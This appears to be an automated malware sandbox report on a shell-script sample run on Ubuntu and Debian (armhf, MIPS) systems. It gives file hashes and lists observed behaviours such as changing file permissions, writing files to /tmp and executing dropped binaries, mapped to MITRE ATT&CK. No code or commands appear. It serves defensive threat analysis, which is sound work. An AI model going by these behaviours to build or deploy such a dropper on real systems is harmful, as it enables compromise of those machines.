Analysis
-
max time kernel
19s -
max time network
133s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97